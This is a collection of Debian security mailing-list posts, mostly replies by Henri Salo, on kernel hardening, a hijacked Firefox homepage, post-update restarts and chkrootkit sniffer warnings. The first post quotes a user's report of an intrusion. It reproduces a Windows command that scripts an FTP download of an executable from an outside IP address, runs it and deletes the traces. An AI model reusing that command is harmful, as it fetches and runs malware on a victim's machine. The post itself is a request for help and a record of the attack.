-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis [EMAIL PROTECTED] wrote: Hello, Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed: %systemroot%\system32\cmd.exe cmd /c echo open 59.31.153.120 22783 ik echo user db database ik echo get 1.exe ik echo bye ik ftp -n -v -s:ik del ik 1.exe exit (I see on my network monitor that this is coming from outside; IP-number and user name vary.) After that all is back to normal. Now this is of course a nuisance, but is it also a thread? And what can be done against it? Anybody got a clue on this? Tia, Jan Outhuis Do you have any kind of VNC-servers running? What is you ip-address? Can i scan your open ports from it? - --- Henri Salo fgeek at fgeek.fi +358407705733 GPG ID: 2EA46E4F fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGQHm1Xf6hBi6kbk8RAvTbAJ0es46vFTz+/6upbt8K3lYYV8HhfwCgs5CC LK0OvGWT07LV7sZuH+RItUE= =J58p -END PGP SIGNATURE-
Re: Hardened linux (debian) recommendation?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sat, 17 Mar 2007 16:55:11 -0700 virendra rode // [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I've already looked at http://www.debian.org/doc/manuals/securing-debian-howto/ But any further pointers will be appreciated. regards, /virendra -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF/H/fpbZvCIJx1bcRAnTFAJ9Oxdb5/hgQSyiAK/BZds7v25/4kwCgiU7W W5eNa1r5DSwcVswrWlB2W+8= =RilM -END PGP SIGNATURE- You can patch your kernel with http://grsecurity.net/ - --- Henri Salo [EMAIL PROTECTED] 0407705733 PGP: http://fgeek.fi/pgp/fgeek-fi-key.asc -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF/ICPXf6hBi6kbk8RAqF9AJwKx+sVSn8hWz9/EMCUGlC3V48HJQCgkGQQ 7lOsIwLmUjONtdxLsvzbkBE= =YIHg -END PGP SIGNATURE-
Re: Firefox on testing hijacked by http://www.megago.com/l/?
Torsten Sadowski wrote: Hi, my Firefox suddenly opens a strange url as the first page. Could anyone give me a hint how to clean it up? Cheers, Torsten At least you should try to change your homepage. After that search information about megago from internet and if you find something about hoaxes or virii you can delete and clean it with help. After all it can be someone from your family and this isn't actual debian security -related problem. -- Henri Salo | [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: When are security updates effective?
Noah Meyerhans wrote: On Tue, Aug 29, 2006 at 10:54:45PM +0200, Moritz Muehlenhoff wrote: If there's anything special to do (e.g. kernel or glibc) we alredy add this to the DSA text. I don't think that's quite enough. I have a few hundred Debian workstations for which I'm responsible, and it's difficult for me to make sure that the users e.g. restart firefox when we release an update. Daemons automatically get restarted, but desktop apps require intervention. In my case, the desktop apps aren't being run by the people installing the updates (the updates are typically installed either remotely or fully automatically) and that makes things even more difficult. I haven't come up with a really good solution to this problem. I actually sort of like the Windows method of incessantly nagging the user to reboot their machine (it literally pops up a dialog box every few minutes). I like the idiot-proof factor. Yes, they can ignore the popups, but they come so quickly that even the most stubborn user will get sick of them and reboot. I'd hate it if I was a Windows user, though, I'm sure! noah Just write a script what closes all firefoxes after update. Haha that wouldn't be so disturbing. -- Henri Salo | [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: chkrootkit sniffers
Lothar Ketterer wrote: Hi, It remains strange because normally, lo is a non-broadcast interface. Maybe it would help to know how Henri has his network configured. Mine is configured with ifupdown, /etc/network/interfaces looks like this: auto lo eth0 iface lo inet loopback iface eth0 inet dhcp and chkrootkit (version 0.46a) gives me eth0: PF_PACKET(/sbin/dhclient, /usr/sbin/arpwatch) lo is not mentioned. Regards, Lothar With ifup in unstable machine: auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp -- Henri Salo [EMAIL PROTECTED] 0407705733 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
chrootkit sniffers
It is actually saying that in both stable and unstable. I don't have testing versions. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
chkrootkit sniffers
I am running Debian stable (kernel 2.6.8-2) chkrootkit version 0.44 with command chkrootkit and it gives me: Checking `sniffer'... lo: PACKET SNIFFER(/sbin/dhclient[29148]) eth0: PACKET SNIFFER(/sbin/dhclient[29148], /sbin/dhclient[29307]) eth1: PACKET SNIFFER(/sbin/dhclient[29148]) is that serious? -- Henri Salo [EMAIL PROTECTED] 0407705733 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]